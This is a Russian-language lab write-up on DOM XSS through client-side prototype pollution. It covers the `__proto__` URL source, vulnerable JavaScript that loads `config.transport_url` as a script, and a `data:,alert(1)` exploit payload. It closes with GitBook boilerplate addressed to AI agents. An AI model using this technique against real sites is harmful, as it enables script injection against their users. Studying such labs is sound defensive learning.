> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/web/prototype-pollution/dom-xss-via-client-side-prototype-pollution.md).

# DOM XSS через прототипное загрязнение на стороне клиента

#### DOM XSS через загрязнение прототипа на стороне клиента

#### Контекст лабораторной работы

Приложение уязвимо к **DOM XSS** вызванный **загрязнение прототипа** (на стороне клиента). / Цель: **загрязнить `Object.prototype`** с полезным свойством, найти **гаджет** в JS, который его обрабатывает, затем запустить `alert()`.

### 1) Наблюдение загрязнения прототипа

#### Источник загрязнения (в URL)

Свойства можно внедрить в `__proto__` через параметры:

<pre class="language-javascript"><code class="lang-javascript"><strong>/?__proto__[foo]=bar
</strong></code></pre>

#### Проверка в консоли

После перехода проверяется, что свойство "fail" есть у всех объектов:

```javascript
console.log({}.foo)
```

<figure><img src="/files/0341f916319c15f8946159469d9080b0192f57bc" alt="" width="563"><figcaption></figcaption></figure>

### 2) Уязвимый код на клиенте

Сайт содержит логику

```javascript
async function logQuery(url, params) {
    try {
        await fetch(url, {method: "post", keepalive: true, body: JSON.stringify(params)});
    } catch(e) {
        console.error("Failed storing query");
    }
}

async function searchLogger() {
    let config = {params: deparam(new URL(location).searchParams.toString())};

    if(config.transport_url) {
        let script = document.createElement('script');
        script.src = config.transport_url;
        document.body.appendChild(script);
    }

    if(config.params && config.params.search) {
        await logQuery('/logger', config.params);
    }
}

window.addEventListener("load", searchLogger);
```

Ключевой момент: код читает **`config.transport_url`** и использует его как **источник `<script>`**.

### 3) Обнаруженный эксплуатируемый гаджет

#### Гаджет

* `config.transport_url`

#### Почему это опасно

Если `transport_url` существует (даже через прототип), скрипт делает:

* создаёт `<script>`
* `script.src = config.transport_url`
* встраивание в DOM

Таким образом мы можем заставить браузер загрузить скрипт с контролируемого URL.

### 4) Действие: вызвать XSS

#### Полезная нагрузка (загрязнение + выполнение)

`Object.prototype.transport_url` загрязняется с помощью `data:` URL, который выполняет `alert(1)`:

```javascript
?__proto__[transport_url]=data:,alert(1)
```

<figure><img src="/files/843db31b2b814e49714d26d1f038d8f1d89d6d6c" alt=""><figcaption></figcaption></figure>

#### Побочный эффект в DOM

В итоге код генерирует нечто эквивалентное:

```javascript
<script src="data:,alert(1)"></script>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/web/prototype-pollution/dom-xss-via-client-side-prototype-pollution.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
